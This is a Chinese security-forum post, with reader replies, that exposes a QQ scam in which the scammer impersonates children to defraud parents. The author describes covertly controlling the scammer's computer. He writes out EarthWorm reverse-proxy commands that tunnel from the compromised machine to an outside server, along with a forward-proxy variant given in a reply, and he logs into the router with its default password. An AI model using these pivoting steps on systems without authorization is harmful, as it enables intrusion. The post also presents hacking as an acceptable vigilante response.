用户
搜索
  • TA的每日心情

    2018-3-2 07:59
  • 签到天数: 8 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    29

    主题

    281

    帖子

    1952

    魔法币
    收听
    0
    粉丝
    88
    注册时间
    2017-4-15

    i春秋认证春秋文阁i春秋签约作者

    发表于 2018-9-29 10:12:11 10516358
    本帖最后由 jasonx 于 2018-9-29 10:12 编辑

    前言

    在互联网高速发展的今天,很多针对网络诈骗的骗术也在日益更新,虽然都在宣传如何防诈骗,但是不断更新的骗术,始终让人防不胜防。

    今天我们揭秘的这个骗子充分利用家长对儿女的关爱,然后冒充子女的对这些家长进行诈骗,过程让人看了揪心、愤怒。

    详情请外下看。

    0x00 关于控制权

    关于如何拿下骗子的控制权,非法控制骗子是否违法这里咱们暂不讨论。

    我的目的很简单,曝光骗子及骗术,让广大网友避免上当受骗

    曝光骗子的骗术,以及所有涉及到的QQ群(包括骗子暂时没有进行诈骗的群),这么做的目的是为了让广大网友知道其中的猫腻,知道如何防止这类诈骗发生。

    0x01 先看一下骗子电脑上的信息

    翻了一下桌面路径,发现很多以QQ群命名的txt文件,里面有很多家长的QQ号码,QQ备注昵称为【XXX妈妈】【XXX爸爸】。

    这是桌面目录下

    我们打开部分文件夹看到很多QQ群成员数据。

    打开这些txt文件后,里面有很多家长的QQ号码,邮箱号码,以及以孩子名为备注的昵称。

    0x02 开始分析

    从上面可以发现,这些文件基本都是初中的班级群,至于骗子是如何拿到这些数据的,我们作了如下猜想;

    1. 骗子混入这些班级群,然后利用QQ群成员导出软件,导出成员数据。
    2. 骗子通过盗号手段,获取到群里某位成员的QQ账号密码,然后利用软件导出成员数据。
    3. 骗子通过其他渠道购买到这些群成员数据。
    首先我们来看一下他的骗术过程。

    骗子会用购买的QQ号,挨个添加家长的QQ,在添加的时候,验证的信息,填写成子女的名字。

    比如他的数据是 李小红妈妈 QQ123456
    骗子会先添加QQ 123456 然后验证信息写上,妈妈,我是李小红。

    注:截图过大,如果看不清楚的话,右键图片>在新选项卡打开就能看清了。

    家长通过添加请求以后,骗子开始套路。

    很多人以为骗子会打字和你聊,其实骗子都是有专门的 “话术” 的。

    “话术” 就是先把很多要说的话,写在一个txt文本里面,然后逐条复制黏贴发送就行了。

    以下是骗子 “话术” 的部分截图。

    0x03 进入骗子内网

    我们先用远控在后台执行一个查询本地IP和网关的命令,从他路由器开始搞起。

    ipconfig

    从下图中可以看到
    他的本机IP地址是192.168.8.100
    网关(也就是路由器)的IP是192.168.8.1

    因为有他电脑控制权,所以进入他局域网就很简单了。
    我们要进入他内网,看看是否还有其他同伙,或者是其他电脑。

    这里我使用了EarthWorm进行了反弹代理

    使用方法如下;
    我们先下载好ew,一个放在本地,一个上传到骗子电脑上。

    然后本地先执行以下命令进行监听;

    ew.exe -s rcsocks -l 1008 -e 888

    大概的意思就是监听本机的888端口,然后转发到1008端口。
    注意,如果你在内网的话,需要先做好端口转发。

    然后在通过远控,在骗子的电脑上执行以下命令;

    ew.exe -s rssocks -d 2.2.2.2 -e 888

    其中的2.2.2.2是你的外网IP,大概意思就是建立一个代理,主动连接到你的2.2.2.2服务器上,端口是888

    当我们看到本地的监听窗口显示 rssocks cmd_socket ok!的时候,说明已经建立成功了。

    现在打开SocksCap64添加一个代理。
    设置ip地址为:127.0.0.1 端口为1008

    在SocksCap64里面打开浏览器,输入对方的路由器地址。
    默认账号密码admin进去了。

    不出所料,和以往的骗子一样,使用的是华为上网设备,用的是流量卡,这种套路对侦查起来还是有点麻烦的。

    切换语言为中文,然后看到里面有个【短信】功能。

    其中发现了目前骗子正在使用的流量卡号以及当前地址。

    他在南宁营业厅缴过费,所以骗子应该就是在南宁了。

    0x04 骗子的信息

    作为一名普通的白帽子,尽我所力,我能做的也就这么多,接下来就看各位警察蜀黍的了。

    地址:广西南宁
    流量卡号:158xxxxx
    IP地址:103.10.1.200 经查这是一个代理地址,没啥用。

    以下是骗子的华为上网设备信息

    0x05 被骗以及即将被骗的群

    请以下群的群主或者管理员发下通知,让家长不要被骗了。

    0x06 写在最后

    请广大网友一定要谨记一点(任何涉及到金钱的东西,必须当面问清楚,或者打电话问清楚)
    不要盲目相信对方就是你的亲人或者是你的朋友,因为任何人的社交账号,比如QQ,微信,都有被盗,被冒充的可能。

    另外我知道在 “爱春秋论坛” 和 “知乎” 上有很多警察和网安的朋友,有愿意出手的可以联系【坏蛋】或者我本人,我将竭尽所能提供帮助。



    用到的反弹代理配套工具,回复可见。

    游客,如果您要查看本帖隐藏内容请回复

    评分

    参与人数 1魔法币 +10 收起 理由
    zzconfig + 10 诈骗不得好死

    查看全部评分


    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    发表于 2018-9-30 08:48:49
    本帖最后由 jasonx 于 2018-9-30 08:54 编辑
    TTZZ 发表于 2018-9-30 08:33
    反弹代理这个是不是和ssh反向隧道一个原理?如果没有外网IP怎么设置,我既不具备外网IP,也不具备端口转发 ...

    转发到你服务器上。
    如果对方有独立外网IP的话,可以使用正向代理。
    方法如下:
    1. 上传ew到对方电脑上。
    2. 然后执行 ew.exe -s ssocksd -l 888
    3. 你本地打开SocksCap64,然后新建一个代理,输入对方的外网IP和端口888.即可建立代理。
    使用道具 举报 回复
    发表于 2018-9-30 11:56:07
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫流光 这个网络他曾来过。
    使用道具 举报 回复
    发表于 2018-9-29 15:04:56
    小小俊俊尧 发表于 2018-9-29 14:33
    通过银行卡转账,这难道抓不到人吗

    黑卡加转到第三方洗钱了解下。
    不过真有警察愿意管的话,我这边收集到的信息已经足够抓到他了。
    使用道具 举报 回复
    发表于 2018-9-30 08:33:04
    反弹代理这个是不是和ssh反向隧道一个原理?如果没有外网IP怎么设置,我既不具备外网IP,也不具备端口转发设置权限,这种情况应该怎么处理呢?
    使用道具 举报 回复
    发表于 2018-10-5 08:39:13
    jasonx 发表于 2018-9-30 08:48
    转发到你服务器上。
    如果对方有独立外网IP的话,可以使用正向代理。
    方法如下:

    6666666跟着大佬学习
    使用道具 举报 回复
    发表于 2018-10-24 11:52:10
    干的漂亮。我们学校近期诈骗团伙近期特别猖狂,也在向学生家长下手。我来学习下技术,看看能不能把团伙揪出来,虽然我只是个小白
    使用道具 举报 回复
    复                           
    使用道具 举报 回复
    发表于 2018-9-29 10:24:17
    这种骗子应该报警抓他
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    支持一下~
    使用道具 举报 回复
    666666666666666666666666666
    使用道具 举报 回复
    发表于 2018-9-29 10:28:40

    感谢分享
    使用道具 举报 回复
    发表于 2018-9-29 10:30:54
    支持一下~
    使用道具 举报 回复
    发表于 2018-9-29 10:32:17
    干得漂亮,注意保护自己
    使用道具 举报 回复
    加油  希望继续更新
    使用道具 举报 回复
    大快人心
    使用道具 举报 回复
    发表于 2018-9-29 10:36:17
    不知道是什么,点开看看
    使用道具 举报 回复
    666666666666666666666666666666666
    使用道具 举报 回复
    发表于 2018-9-29 10:47:21
    愿天下所有骗子早日被抓
    使用道具 举报 回复
    发表于 2018-9-29 10:47:57
    大佬牛逼
    使用道具 举报 回复
    发表于 2018-9-29 10:56:27
    大佬牛逼
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册